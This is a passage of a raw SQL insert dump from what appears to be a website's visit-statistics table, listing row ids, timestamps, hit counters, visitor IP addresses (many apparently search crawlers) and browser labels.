r'),(191637,1514415442,1,1,0,0,'51.255.71.131','other'),(191638,1514415477,1,1,0,0,'54.36.148.190','other'),(191639,1514415650,1,0,1,0,'66.249.64.28',''),(191640,1514416488,1,1,0,0,'54.36.148.191','other'),(191641,1514416594,1,1,0,0,'54.36.148.254','other'),(191642,1514416748,1,1,0,0,'54.36.148.154','other'),(191643,1514416919,1,1,0,0,'51.255.71.125','other'),(191644,1514417404,1,1,0,0,'54.36.148.147','other'),(191645,1514417447,1,1,0,0,'54.36.149.2','other'),(191646,1514417646,1,1,0,0,'54.36.149.102','other'),(191647,1514417894,1,1,0,0,'54.36.148.74','other'),(191648,1514418026,1,1,0,0,'37.9.113.100','other'),(191649,1514418161,1,1,0,0,'178.154.171.4','other'),(191650,1514418314,1,1,0,0,'8.29.198.27','other'),(191651,1514418504,1,1,0,0,'178.154.171.81','other'),(191652,1514418546,1,1,0,0,'54.36.149.31','other'),(191653,1514418548,1,1,0,0,'54.36.149.68','other'),(191654,1514418593,1,1,0,0,'54.36.148.127','other'),(191655,1514418700,1,1,0,0,'54.36.148.177','other'),(191656,1514418735,1,1,0,0,'54.36.149.52','other'),(191657,1514418839,1,1,0,0,'54.36.148.160','other'),(191658,1514418984,1,1,0,0,'37.9.113.101','other'),(191659,1514418991,1,1,0,0,'207.46.13.112','other'),(191660,1514419113,1,1,0,0,'54.36.148.96','other'),(191661,1514419144,1,1,0,0,'54.36.149.53','other'),(191662,1514419712,1,1,0,0,'54.36.148.90','other'),(191663,1514419862,1,1,0,0,'54.36.148.18','other'),(191664,1514420474,1,1,0,0,'54.36.149.18','other'),(191665,1514420586,1,1,0,0,'54.36.149.20','other'),(191666,1514420616,1,1,0,0,'54.36.148.171','other'),(191667,1514420710,1,1,0,0,'54.36.148.252','other'),(191668,1514420863,1,1,0,0,'54.36.149.75','other'),(191669,1514420973,1,1,0,0,'5.45.207.12','other'),(191670,1514421034,1,1,0,0,'54.36.148.133','other'),(191671,1514421174,1,1,0,0,'207.46.13.129','other'),(191672,1514421900,1,1,0,0,'213.180.203.8','other'),(191673,1514422119,1,1,0,0,'46.42.130.89','msie'),(191674,1514422329,1,1,0,0,'54.36.149.61','other'),(191675,1514422395,1,1,0,0,'54.36.148.157','other'),(191676,1514422577,1,1,0,0,'54.36.148.184','other'),(191677,1514422756,1,1,0,0,'91.200.12.196','chrome'),(191678,1514422788,1,1,0,0,'54.36.149.12','other'),(191679,1514423010,1,1,0,0,'54.36.148.130','other'),(191680,1514423160,1,1,0,0,'141.8.142.126','other'),(191681,1514423421,1,1,0,0,'54.36.149.71','other'),(191682,1514423576,1,1,0,0,'54.36.148.168','other'),(191683,1514423978,1,1,0,0,'54.36.149.75','other'),(191684,1514424128,1,0,1,0,'66.249.64.28',''),(191685,1514424438,1,1,0,0,'51.255.71.131','other'),(191686,1514424517,1,1,0,0,'54.36.148.101','other'),(191687,1514424733,1,1,0,0,'54.36.148.161','other'),(191688,1514424760,1,1,0,0,'54.36.148.230','other'),(191689,1514425140,1,1,0,0,'54.36.148.129','other'),(191690,1514425776,1,1,0,0,'54.36.148.107','other'),(191691,1514425902,1,1,0,0,'54.36.148.56','other'),(191692,1514426530,1,1,0,0,'54.36.148.203','other'),(191693,1514426673,1,1,0,0,'157.55.39.203','other'),(191694,1514426971,1,1,0,0,'54.36.148.238','other'),(191695,1514427736,1,1,0,0,'54.36.149.40','other'),(191696,1514428211,1,1,0,0,'54.36.148.96','other'),(191697,1514428787,1,1,0,0,'54.36.148.70','other'),(191698,1514428792,1,1,0,0,'54.36.149.5','other'),(191699,1514429142,1,1,0,0,'8.29.198.25','other'),(191700,1514429198,1,1,0,0,'54.36.148.150','other'),(191701,1514429332,1,1,0,0,'54.36.148.189','other'),(191702,1514429762,1,1,0,0,'54.36.149.40','other'),(191703,1514429799,1,1,0,0,'157.55.39.203','other'),(191704,1514430002,1,1,0,0,'54.36.148.239','other'),(191705,1514430145,1,1,0,0,'54.36.148.101','other'),(191706,1514430197,1,1,0,0,'54.36.149.35','other'),(191707,1514430421,1,1,0,0,'54.36.148.199','other'),(191708,1514430440,1,1,0,0,'54.36.148.11','other'),(191709,1514430904,1,1,0,0,'54.36.149.15','other'),(191710,1514431018,1,1,0,0,'54.36.148.159','other'),(191711,1514431019,1,1,0,0,'54.36.148.94','other'),(191712,1514431269,2,2,0,0,'54.36.148.65','other'),(191713,1514431345,1,1,0,0,'178.154.171.81','other'),(191714,1514431527,1,1,0,0,'54.36.148.135','other'),(191715,1514431900,2,2,0,0,'207.46.13.112','other'),(191716,1514432203,1,1,0,0,'54.36.148.36','other'),(191717,1514432318,1,1,0,0,'213.180.203.8','other'),(191718,1514432554,1,1,0,0,'157.55.39.203','other'),(191719,1514433004,1,1,0,0,'54.36.148.162','other'),(191720,1514433622,1,1,0,0,'207.46.13.129','other'),(191721,1514433623,1,1,0,0,'207.46.13.112','other'),(191722,1514433849,1,1,0,0,'54.36.149.48','other'),(191723,1514433862,1,1,0,0,'54.36.148.117','other'),(191724,1514433864,1,1,0,0,'54.36.149.37','other'),(191725,1514433994,1,1,0,0,'54.36.148.83','other'),(191726,1514434162,1,1,0,0,'54.36.148.252','other'),(191727,1514434370,1,0,1,0,'66.249.64.29',''),(191728,1514434775,1,1,0,0,'217.69.133.239','other'),(191729,1514434869,1,1,0,0,'54.36.148.196','other'),(191730,1514435286,1,1,0,0,'54.36.148.48','other'),(191731,1514435374,1,1,0,0,'54.36.148.77','other'),(191732,1514435454,1,1,0,0,'54.36.148.148','other'),(191733,1514435588,1,1,0,0,'54.36.149.48','other'),(191734,1514435683,1,1,0,0,'54.36.148.188','other'),(191735,1514436138,1,1,0,0,'54.36.148.41','other'),(191736,1514436495,1,1,0,0,'54.36.149.11','other'),(191737,1514436503,2,2,0,0,'207.46.13.129','other'),(191738,1514436519,1,1,0,0,'54.36.148.124','other'),(191739,1514437136,1,1,0,0,'54.36.148.157','other'),(191740,1514437585,1,1,0,0,'157.55.39.203','other'),(191741,1514437948,1,1,0,0,'54.36.148.241','other'),(191742,1514438103,1,1,0,0,'54.36.148.45','other'),(191743,1514438678,1,1,0,0,'54.36.149.37','other'),(191744,1514438824,1,0,1,0,'66.249.64.30',''),(191745,1514438988,1,1,0,0,'54.36.148.96','other'),(191746,1514438995,1,1,0,0,'54.36.148.207','other'),(191747,1514439225,1,1,0,0,'54.36.148.138','other'),(191748,1514439242,1,1,0,0,'54.36.149.95','other'),(191749,1514439521,1,1,0,0,'40.77.167.101','other'),(191750,1514439542,1,1,0,0,'217.69.133.220','other'),(191751,1514439655,1,1,0,0,'54.36.149.106','other'),(191752,1514439675,1,1,0,0,'54.36.148.76','other'),(191753,1514439681,1,1,0,0,'54.36.149.107','other'),(191754,1514439979,1,1,0,0,'8.29.198.25','other'),(191755,1514440161,1,1,0,0,'54.36.148.43','other'),(191756,1514440331,1,1,0,0,'54.36.148.152','other'),(191757,1514440465,1,1,0,0,'54.36.149.98','other'),(191758,1514440642,1,1,0,0,'207.46.13.112','other'),(191759,1514440712,1,1,0,0,'54.36.149.90','other'),(191760,1514440887,1,1,0,0,'54.36.148.191','other'),(191761,1514441041,1,1,0,0,'54.36.149.25','other'),(191762,1514441355,1,1,0,0,'51.255.71.118','other'),(191763,1514441512,1,1,0,0,'54.36.148.167','other'),(191764,1514441805,1,1,0,0,'54.36.148.33','other'),(191765,1514441899,1,1,0,0,'54.36.149.94','other'),(191766,1514441912,1,1,0,0,'207.46.13.129','other'),(191767,1514441957,1,1,0,0,'217.69.133.221','other'),(191768,1514442116,1,1,0,0,'51.255.71.128','other'),(191769,1514442988,1,1,0,0,'54.36.149.62','other'),(191770,1514443077,1,1,0,0,'54.36.148.135','other'),(191771,1514443112,1,1,0,0,'207.46.13.112','other'),(191772,1514443477,1,1,0,0,'54.36.149.63','other'),(191773,1514443650,1,1,0,0,'95.133.27.154','chrome'),(191774,1514443661,1,1,0,0,'54.36.148.255','other'),(191775,1514443836,1,1,0,0,'54.36.148.194','other'),(191776,1514444104,1,1,0,0,'54.36.149.87','other'),(191777,1514444155,1,1,0,0,'213.110.139.33','firefox'),(191778,1514444196,1,1,0,0,'109.86.72.163','firefox'),(191779,1514444225,1,1,0,0,'54.36.148.57','other'),(191780,1514444327,1,1,0,0,'54.36.149.15','other'),(191781,1514444480,1,1,0,0,'54.36.148.164','other'),(191782,1514444518,1,1,0,0,'54.36.149.72','other'),(191783,1514444554,1,1,0,0,'54.36.148.148','other'),(191784,1514444928,1,1,0,0,'54.36.148.21','other'),(191785,1514444929,1,1,0,0,'54.36.148.111','other'),(191786,1514444980,1,1,0,0,'54.36.148.242','other'),(191787,1514445269,1,1,0,0,'54.36.148.71','other'),(191788,1514445973,1,1,0,0,'54.36.148.157','other'),(191789,1514445989,1,1,0,0,'95.132.10.200','firefox'),(191790,1514446076,2,2,0,0,'91.196.178.65','chrome'),(191791,1514446155,1,1,0,0,'54.36.148.22','other'),(191792,1514446217,1,1,0,0,'54.36.148.13','other'),(191793,1514446337,1,0,1,0,'66.249.70.29',''),(191794,1514446637,1,1,0,0,'54.36.148.69','other'),(191795,1514446693,1,1,0,0,'54.36.148.135','other'),(191796,1514446707,1,1,0,0,'91.234.0.180','chrome'),(191797,1514446728,1,1,0,0,'157.55.39.203','other'),(191798,1514446771,1,1,0,0,'54.36.149.104','other'),(191799,1514447020,1,1,0,0,'54.36.149.14','other'),(191800,1514447318,1,1,0,0,'54.36.148.158','other'),(191801,1514447552,1,1,0,0,'95.132.10.200','firefox'),(191802,1514447749,1,1,0,0,'54.36.148.165','other'),(191803,1514447812,1,1,0,0,'92.112.18.217','chrome'),(191804,1514447997,1,1,0,0,'91.196.177.46','chrome'),(191805,1514448123,1,1,0,0,'54.36.148.248','other'),(191806,1514448173,1,1,0,0,'54.36.149.89','other'),(191807,1514448175,2,2,0,0,'91.196.178.65','chrome'),(191808,1514448191,1,1,0,0,'207.46.13.112','other'),(191809,1514448593,1,1,0,0,'54.36.148.201','other'),(191810,1514448631,1,1,0,0,'54.36.148.16','other'),(191811,1514448644,1,1,0,0,'51.255.71.126','other'),(191812,1514448683,1,1,0,0,'54.36.149.12','other'),(191813,1514448761,1,1,0,0,'54.36.148.78','other'),(191814,1514448833,1,1,0,0,'54.36.148.243','other'),(191815,1514449094,1,1,0,0,'54.36.149.62','other'),(191816,1514449125,1,1,0,0,'54.36.149.15','other'),(191817,1514449233,1,1,0,0,'91.196.178.65','chrome'),(191818,1514449460,1,1,0,0,'54.36.148.77','other'),(191819,1514449569,1,1,0,0,'54.36.148.129','other'),(191820,1514449605,1,1,0,0,'54.36.148.144','other'),(191821,1514449692,1,1,0,0,'54.36.149.79','other'),(191822,1514449717,1,1,0,0,'82.145.221.45','chrome'),(191823,1514449781,1,1,0,0,'54.36.149.81','other'),(191824,1514449826,1,1,0,0,'77.247.181.162','chrome'),(191825,1514450393,1,1,0,0,'54.36.148.45','other'),(191826,1514450410,1,1,0,0,'54.36.149.50','other'),(191827,1514450562,1,1,0,0,'178.154.171.81','other'),(191828,1514450803,1,1,0,0,'8.29.198.25','other'),(191829,1514450852,1,1,0,0,'54.36.148.132','other'),(191830,1514450898,1,1,0,0,'54.36.148.68','other'),(191831,1514450987,1,1,0,0,'91.196.178.65','chrome'),(191832,1514451032,1,1,0,0,'54.36.149.84','other'),(191833,1514451056,1,1,0,0,'91.196.178.164','chrome'),(191834,1514451123,1,1,0,0,'207.46.13.112','other'),(191835,1514451703,1,1,0,0,'217.69.133.11','other'),(191836,1514451798,1,1,0,0,'54.36.148.187','other'),(191837,1514451992,1,1,0,0,'54.36.149.98','other'),(191838,1514452184,1,1,0,0,'54.36.148.188','other'),(191839,1514452203,2,2,0,0,'54.36.148.162','other'),(191840,1514452309,1,1,0,0,'51.255.71.129','other'),(191841,1514452387,1,1,0,0,'54.36.148.78','other'),(191842,1514452439,1,1,0,0,'54.36.149.92','other'),(191843,1514452490,1,1,0,0,'46.160.179.199','chrome'),(191844,1514452496,1,1,0,0,'54.36.149.101','other'),(191845,1514452500,1,1,0,0,'91.196.178.162','chrome'),(191846,1514452917,1,1,0,0,'54.36.148.107','other'),(191847,1514452968,1,1,0,0,'54.36.148.154','other'),(191848,1514453054,1,1,0,0,'54.36.148.119','other'),(191849,1514453242,1,1,0,0,'54.36.148.174','other'),(191850,1514453299,1,1,0,0,'54.36.148.85','other'),(191851,1514453661,1,0,1,0,'66.249.64.30',''),(191852,1514453752,1,1,0,0,'54.36.148.82','other'),(191853,1514454217,1,1,0,0,'54.36.148.138','other'),(191854,1514454464,1,1,0,0,'54.36.149.105','other'),(191855,1514454498,1,1,0,0,'54.36.148.128','other'),(191856,1514454505,1,1,0,0,'54.36.148.234','other'),(191857,1514455022,1,1,0,0,'216.244.65.59','chrome'),(191858,1514455239,1,1,0,0,'54.36.149.34','other'),(191859,1514455549,1,1,0,0,'54.36.149.37','other'),(191860,1514455553,1,1,0,0,'54.36.148.162','other'),(191861,1514455633,1,1,0,0,'54.36.149.35','other'),(191862,1514455947,1,1,0,0,'217.69.133.12','other'),(191863,1514455988,1,1,0,0,'91.196.178.167','chrome'),(191864,1514455995,1,1,0,0,'91.196.178.72','firefox'),(191865,1514456042,1,1,0,0,'54.36.148.20','other'),(191866,1514456273,1,1,0,0,'207.46.13.112','other'),(191867,1514456433,1,1,0,0,'54.36.149.43','other'),(191868,1514456819,1,1,0,0,'54.36.148.76','other'),(191869,1514457045,1,1,0,0,'54.36.148.139','other'),(191870,1514457058,1,1,0,0,'37.9.113.56','other'),(191871,1514457129,1,1,0,0,'54.36.149.10','other'),(191872,1514457287,1,1,0,0,'51.255.71.128','other'),(191873,1514457395,1,1,0,0,'54.36.149.87','other'),(191874,1514458026,1,1,0,0,'54.36.148.61','other'),(191875,1514458098,1,1,0,0,'54.36.148.178','other'),(191876,1514458168,1,1,0,0,'91.196.178.167','chrome'),(191877,1514458385,1,1,0,0,'54.36.149.79','other'),(191878,1514458660,1,1,0,0,'54.36.149.41','other'),(191879,1514458866,1,1,0,0,'54.36.149.9','other'),(191880,1514458900,2,2,0,0,'54.36.148.68','other'),(191881,1514459097,1,1,0,0,'54.36.148.107','other'),(191882,1514459178,1,1,0,0,'54.36.148.96','other'),(191883,1514459393,1,1,0,0,'54.36.148.249','other'),(191884,1514459710,1,1,0,0,'54.36.149.91','other'),(191885,1514459803,1,1,0,0,'40.77.167.101','other'),(191886,1514459957,1,1,0,0,'54.36.149.8','other'),(191887,1514460116,1,1,0,0,'51.255.71.116','other'),(191888,1514460733,1,1,0,0,'54.36.148.170','other'),(191889,1514461078,1,1,0,0,'207.46.13.112','other'),(191890,1514461466,1,1,0,0,'54.36.149.84','other'),(191891,1514461604,1,1,0,0,'54.36.148.240','other'),(191892,1514461632,1,1,0,0,'8.29.198.25','other'),(191893,1514461830,1,1,0,0,'46.174.163.134','chrome'),(191894,1514461907,1,1,0,0,'188.255.91.119','msie'),(191895,1514461908,1,1,0,0,'94.180.160.84','msie'),(191896,1514462103,1,1,0,0,'217.69.133.23','other'),(191897,1514462205,1,1,0,0,'82.207.91.234','other'),(191898,1514462561,1,1,0,0,'54.36.149.56','other'),(191899,1514463002,1,1,0,0,'54.36.148.160','other'),(191900,1514463075,1,1,0,0,'54.36.149.65','other'),(191901,1514463286,1,1,0,0,'54.36.148.251','other'),(191902,1514463478,1,1,0,0,'54.36.148.36','other'),(191903,1514464252,1,1,0,0,'54.36.148.229','other'),(191904,1514464275,1,1,0,0,'207.46.13.129','other'),(191905,1514464430,1,1,0,0,'54.36.148.114','other'),(191906,1514464558,1,1,0,0,'54.36.148.92','other'),(191907,1514464793,1,1,0,0,'54.36.148.137','other'),(191908,1514465144,1,1,0,0,'54.36.148.147','other'),(191909,1514465241,1,1,0,0,'54.36.148.139','other'),(191910,1514465296,1,1,0,0,'54.36.148.132','other'),(191911,1514465918,1,1,0,0,'95.135.121.30','chrome'),(191912,1514466040,1,1,0,0,'54.36.148.52','other'),(191913,1514466449,1,1,0,0,'54.36.148.85','other'),(191914,1514466533,1,1,0,0,'54.36.148.191','other'),(191915,1514466568,1,1,0,0,'54.36.148.112','other'),(191916,1514466704,1,1,0,0,'54.36.148.59','other'),(191917,1514466783,1,1,0,0,'54.36.148.40','other'),(191918,1514466901,1,1,0,0,'54.36.148.48','other'),(191919,1514467111,1,1,0,0,'13.56.229.65','chrome'),(191920,1514467125,1,1,0,0,'54.36.148.147','other'),(191921,1514467334,1,1,0,0,'40.77.167.101','other'),(191922,1514467338,1,1,0,0,'51.15.209.146','firefox'),(191923,1514467574,1,1,0,0,'54.36.149.65','other'),(191924,1514467584,1,1,0,0,'54.36.148.93','other'),(191925,1514467809,1,1,0,0,'66.249.64.28','chrome'),(191926,1514467875,1,1,0,0,'54.36.148.61','other'),(191927,1514468107,1,1,0,0,'54.36.148.37','other'),(191928,1514468362,1,1,0,0,'54.36.148.239','other'),(191929,1514468435,1,1,0,0,'54.36.148.54','other'),(191930,1514468621,1,1,0,0,'37.52.16.177','chrome'),(191931,1514468934,1,0,1,0,'66.249.70.25',''),(191932,1514468936,1,1,0,0,'54.36.149.57','other'),(191933,1514468953,1,1,0,0,'54.36.149.8','other'),(191934,1514469029,1,1,0,0,'54.36.148.140','other'),(191935,1514469110,1,1,0,0,'91.196.178.72','firefox'),(191936,1514469375,1,1,0,0,'37.55.109.57','chrome'),(191937,1514469389,1,1,0,0,'141.8.142.74','other'),(191938,1514469390,1,1,0,0,'178.154.171.88','other'),(191939,1514469400,1,1,0,0,'54.36.148.47','other'),(191940,1514469464,1,1,0,0,'54.36.149.41','other'),(191941,1514469686,1,1,0,0,'54.36.148.132','other'),(191942,1514469873,1,1,0,0,'51.255.71.123','other'),(191943,1514469976,1,1,0,0,'54.36.148.142','other'),(191944,1514470126,1,1,0,0,'54.36.148.11','other'),(191945,1514470334,1,1,0,0,'54.36.148.33','other'),(191946,1514470352,2,2,0,0,'54.36.149.69','other'),(191948,1514470360,1,1,0,0,'77.111.244.13','chrome'),(191949,1514470449,1,1,0,0,'54.36.148.40','other'),(191950,1514470610,1,1,0,0,'54.36.148.120','other'),(191951,1514470705,1,1,0,0,'37.52.43.235','chrome'),(191952,1514470745,1,1,0,0,'54.36.148.180','other'),(191953,1514470886,1,1,0,0,'217.69.136.204','other'),(191954,1514470958,1,1,0,0,'54.36.148.132','other'),(191955,1514471050,1,1,0,0,'141.8.142.74','other'),(191956,1514471306,1,1,0,0,'91.196.178.65','chrome'),(191957,1514471505,1,0,1,0,'66.249.64.28',''),(191958,1514471641,1,1,0,0,'51.255.71.116','other'),(191959,1514471734,1,1,0,0,'54.36.149.47','other'),(191960,1514471893,1,1,0,0,'54.36.148.231','other'),(191961,1514471926,1,1,0,0,'54.36.148.121','other'),(191962,1514471991,1,1,0,0,'54.36.149.70','other'),(191963,1514472026,1,1,0,0,'54.36.149.5','other'),(191964,1514472466,1,1,0,0,'8.29.198.26','other'),(191965,1514472579,1,1,0,0,'54.36.148.71','other'),(191966,1514472852,2,2,0,0,'40.77.167.101','other'),(191967,1514473030,1,1,0,0,'54.36.148.29','other'),(191968,1514473155,1,1,0,0,'51.255.71.116','other'),(191969,1514473241,1,1,0,0,'54.36.148.108','other'),(191970,1514473324,1,1,0,0,'54.36.148.165','other'),(191971,1514473380,1,1,0,0,'157.55.39.203','other'),(191972,1514473642,1,0,1,0,'66.249.70.29',''),(191973,1514473917,1,1,0,0,'54.36.148.14','other'),(191975,1514473926,1,1,0,0,'207.46.13.112','other'),(191976,1514474320,1,1,0,0,'54.36.148.78','other'),(191977,1514474415,1,1,0,0,'54.36.149.96','other'),(191978,1514474603,1,1,0,0,'54.36.148.207','other'),(191979,1514475226,1,1,0,0,'54.36.148.15','other'),(191980,1514475370,1,1,0,0,'54.36.148.32','other'),(191981,1514475838,1,1,0,0,'54.36.148.40','other'),(191982,1514475839,1,1,0,0,'195.225.147.207','chrome'),(191983,1514475842,1,1,0,0,'207.46.13.112','other'),(191984,1514475949,1,1,0,0,'54.36.148.91','other'),(191985,1514475989,1,1,0,0,'54.36.148.165','other'),(191986,1514475992,1,1,0,0,'91.225.165.16','chrome'),(191987,1514476097,1,1,0,0,'54.36.148.74','other'),(191988,1514476441,1,1,0,0,'54.36.148.38','other'),(191989,1514476748,1,1,0,0,'54.36.148.250','other'),(191990,1514476926,1,1,0,0,'207.46.13.112','other'),(191991,1514477149,1,1,0,0,'54.36.148.123','other'),(191992,1514477154,1,1,0,0,'54.36.148.167','other'),(191993,1514477304,1,1,0,0,'54.36.149.32','other'),(191994,1514477482,1,1,0,0,'54.36.148.234','other'),(191995,1514477542,1,1,0,0,'54.36.148.252','other'),(191996,1514477609,1,1,0,0,'54.36.149.36','other'),(191997,1514477878,1,1,0,0,'54.36.148.132','other'),(191998,1514477906,1,1,0,0,'87.250.224.46','other'),(191999,1514478231,1,1,0,0,'54.36.148.88','other'),(192000,1514478416,1,1,0,0,'54.36.148.65','other'),(192001,1514478551,1,1,0,0,'54.36.149.91','other'),(192002,1514478679,1,1,0,0,'54.36.148.90','other'),(192003,1514478830,1,1,0,0,'54.36.148.24','other'),(192004,1514478928,1,1,0,0,'54.36.148.135','other'),(192005,1514479036,1,1,0,0,'54.36.148.46','other'),(192006,1514479242,2,2,0,0,'157.55.39.203','other'),(192007,1514479245,1,1,0,0,'54.36.148.148','other'),(192008,1514479363,1,1,0,0,'54.36.149.103','other'),(192009,1514479621,1,1,0,0,'54.36.149.26','other'),(192010,1514479716,1,1,0,0,'54.36.148.129','other'),(192011,1514479800,2,2,0,0,'199.58.86.209','other'),(192012,1514480024,1,1,0,0,'54.36.148.130','other'),(192013,1514480479,1,1,0,0,'54.36.149.57','other'),(192014,1514480564,1,1,0,0,'54.36.148.143','other'),(192015,1514480996,1,1,0,0,'54.36.148.171','other'),(192016,1514481021,1,1,0,0,'91.196.178.66','chrome'),(192017,1514481100,1,1,0,0,'54.36.149.37','other'),(192018,1514481224,1,1,0,0,'91.196.178.65','firefox'),(192019,1514481428,1,1,0,0,'2.92.194.202','msie'),(192020,1514481513,1,1,0,0,'54.36.148.115','other'),(192021,1514481551,1,1,0,0,'54.36.148.125','other'),(192022,1514481893,1,1,0,0,'54.36.148.70','other'),(192023,1514482081,1,1,0,0,'157.55.39.203','other'),(192024,1514482333,1,1,0,0,'54.36.149.58','other'),(192025,1514482472,1,0,1,0,'66.249.70.27',''),(192026,1514482698,1,1,0,0,'54.36.149.25','other'),(192027,1514482974,1,1,0,0,'77.121.173.56','chrome'),(192028,1514483209,1,1,0,0,'54.36.149.78','other'),(192029,1514483232,1,1,0,0,'46.201.50.7','chrome'),(192030,1514483309,1,1,0,0,'8.29.198.25','other'),(192031,1514483314,1,1,0,0,'54.36.148.153','other'),(192032,1514483815,1,1,0,0,'54.36.149.60','other'),(192033,1514484325,1,1,0,0,'54.36.148.155','other'),(192034,1514484659,1,1,0,0,'54.36.149.18','other'),(192035,1514484715,1,1,0,0,'157.55.39.203','other'),(192036,1514484801,1,1,0,0,'54.36.148.128','other'),(192037,1514485359,1,1,0,0,'54.36.149.22','other'),(192038,1514485422,1,1,0,0,'54.36.149.83','other'),(192039,1514486243,1,1,0,0,'91.196.178.98','chrome'),(192040,1514486561,1,1,0,0,'40.77.167.101','other'),(192041,1514486609,1,1,0,0,'54.36.149.98','other'),(192042,1514486734,1,1,0,0,'54.36.148.121','other'),(192043,1514486823,1,1,0,0,'54.36.148.29','other'),(192044,1514486987,1,1,0,0,'54.36.148.146','other'),(192045,1514487149,1,1,0,0,'54.36.149.14','other'),(192046,1514487335,1,1,0,0,'54.36.148.75','other'),(192047,1514487430,4,4,0,0,'91.196.178.102','chrome'),(192048,1514487557,1,1,0,0,'54.36.149.89','other'),(192049,1514487662,1,1,0,0,'54.36.149.58','other'),(192050,1514487722,1,1,0,0,'54.36.149.54','other'),(192051,1514487772,1,1,0,0,'207.46.13.112','other'),(192052,1514487793,1,1,0,0,'157.55.39.203','other'),(192053,1514488321,1,1,0,0,'54.36.149.96','other'),(192054,1514488426,1,1,0,0,'54.36.148.93','other'),(192055,1514488440,1,1,0,0,'207.46.13.129','other'),(192056,1514488685,1,1,0,0,'54.36.148.102','other'),(192057,1514488693,1,1,0,0,'217.69.133.252','other'),(192058,1514488850,1,1,0,0,'54.36.148.22','other'),(192059,1514488865,1,1,0,0,'54.36.148.57','other'),(192060,1514489266,1,1,0,0,'207.46.13.112','other'),(192061,1514489275,1,1,0,0,'54.36.148.251','other'),(192062,1514489364,1,1,0,0,'54.36.148.71','other'),(192063,1514489905,1,1,0,0,'207.46.13.129','other'),(192064,1514489918,1,1,0,0,'40.77.167.101','other'),(192065,1514489994,1,1,0,0,'178.154.171.88','other'),(192066,1514490322,1,1,0,0,'54.36.149.92','other'),(192067,1514490346,1,1,0,0,'54.36.149.106','other'),(192068,1514490373,1,1,0,0,'54.36.149.28','other'),(192069,1514490410,1,1,0,0,'54.36.148.232','other'),(192070,1514490611,1,1,0,0,'54.36.148.98','other'),(192071,1514490750,1,1,0,0,'54.36.148.99','other'),(192072,1514490903,1,1,0,0,'207.46.13.129','other'),(192073,1514491109,1,1,0,0,'54.36.148.162','other'),(192074,1514491112,1,1,0,0,'207.46.13.112','other'),(192075,1514491129,1,1,0,0,'54.36.148.113','other'),(192076,1514491326,1,1,0,0,'54.36.148.137','other'),(192077,1514491383,1,1,0,0,'54.36.148.86','other'),(192078,1514491578,1,1,0,0,'178.154.171.88','other'),(192079,1514491617,1,1,0,0,'54.36.149.64','other'),(192080,1514491762,1,0,1,0,'66.249.64.28',''),(192081,1514491807,1,1,0,0,'54.36.149.56','other'),(192082,1514491972,1,1,0,0,'54.36.148.172','other'),(192083,1514492206,1,1,0,0,'95.132.50.93','chrome'),(192084,1514492446,1,1,0,0,'157.55.39.203','other'),(192085,1514492456,1,1,0,0,'54.36.148.37','other'),(192086,1514492665,1,1,0,0,'54.36.148.38','other'),(192087,1514492953,1,1,0,0,'54.36.148.161','other'),(192088,1514493135,1,1,0,0,'207.46.13.112','other'),(192089,1514493294,1,1,0,0,'54.36.148.159','other'),(192090,1514493359,1,1,0,0,'54.36.148.129','other'),(192091,1514493407,1,1,0,0,'54.36.149.19','other'),(192092,1514493444,1,1,0,0,'54.36.148.104','other'),(192093,1514493497,2,2,0,0,'157.55.39.203','other'),(192094,1514493744,1,1,0,0,'54.36.148.204','other'),(192095,1514494009,1,1,0,0,'40.77.167.101','other'),(192096,1514494141,1,1,0,0,'8.29.198.26','other'),(192097,1514494459,1,1,0,0,'54.36.149.4','other'),(192098,1514494615,1,1,0,0,'95.132.50.93','chrome'),(192099,1514494945,1,1,0,0,'54.36.148.64','other'),(192100,1514495144,1,1,0,0,'128.70.144.89','firefox'),(192101,1514495300,1,1,0,0,'54.36.148.17','other'),(192102,1514495314,1,1,0,0,'54.36.149.63','other'),(192103,1514495470,1,1,0,0,'54.36.149.105','other'),(192104,1514495694,1,1,0,0,'54.36.148.235','other'),(192105,1514495939,1,1,0,0,'54.36.148.86','other'),(192106,1514495956,1,1,0,0,'54.36.148.141','other'),(192107,1514496068,1,1,0,0,'54.36.148.151','other'),(192108,1514496126,1,1,0,0,'54.36.148.208','other'),(192109,1514496241,1,1,0,0,'54.36.149.88','other'),(192110,1514496338,1,1,0,0,'54.36.148.84','other'),(192111,1514496345,1,1,0,0,'54.36.148.65','other'),(192112,1514496853,1,1,0,0,'54.36.148.231','other'),(192113,1514497114,1,1,0,0,'54.36.148.208','other'),(192114,1514497371,2,2,0,0,'207.46.13.129','other'),(192115,1514497524,1,1,0,0,'207.46.13.112','other'),(192116,1514497538,1,1,0,0,'40.77.167.101','other'),(192117,1514497593,2,2,0,0,'141.8.142.74','other'),(192118,1514497670,1,1,0,0,'54.36.148.229','other'),(192119,1514497741,1,1,0,0,'54.36.148.237','other'),(192120,1514497757,1,1,0,0,'54.36.149.64','other'),(192121,1514497944,1,1,0,0,'54.36.148.250','other'),(192122,1514498046,1,0,1,0,'66.249.64.28',''),(192123,1514498227,1,1,0,0,'54.36.149.78','other'),(192124,1514498474,1,1,0,0,'54.36.149.34','other'),(192125,1514498944,1,1,0,0,'54.36.148.78','other'),(192126,1514499300,1,1,0,0,'54.36.148.239','other'),(192127,1514499461,1,0,1,0,'66.249.64.29',''),(192128,1514499530,1,1,0,0,'54.36.149.14','other'),(192129,1514499580,1,1,0,0,'54.36.148.171','other'),(192130,1514499921,1,1,0,0,'54.36.149.33','other'),(192131,1514500095,1,1,0,0,'54.36.149.46','other'),(192132,1514500137,1,1,0,0,'54.36.148.34','other'),(192133,1514500160,1,1,0,0,'66.249.64.29','chrome'),(192134,1514500290,1,1,0,0,'54.36.148.151','other'),(192135,1514500376,1,1,0,0,'54.36.148.14','other'),(192136,1514500518,1,1,0,0,'54.36.149.93','other'),(192137,1514500636,1,1,0,0,'54.36.149.34','other'),(192138,1514500678,1,1,0,0,'54.36.148.193','other'),(192139,1514500700,1,1,0,0,'54.36.149.100','other'),(192140,1514500719,1,1,0,0,'54.36.148.114','other'),(192141,1514500925,1,1,0,0,'54.36.148.245','other'),(192142,1514500961,1,1,0,0,'51.255.71.119','other'),(192143,1514501024,1,1,0,0,'54.36.148.72','other'),(192144,1514501310,1,1,0,0,'54.36.148.255','other'),(192145,1514501374,1,1,0,0,'207.46.13.129','other'),(192146,1514501704,1,1,0,0,'54.36.148.145','other'),(192147,1514501909,1,1,0,0,'54.36.148.56','other'),(192148,1514501917,1,1,0,0,'54.36.148.151','other'),(192149,1514502015,1,1,0,0,'51.255.71.126','other'),(192150,1514502240,1,1,0,0,'54.36.148.23','other'),(192151,1514502264,1,1,0,0,'54.36.148.197','other'),(192152,1514502471,1,1,0,0,'54.36.148.33','other'),(192153,1514502559,1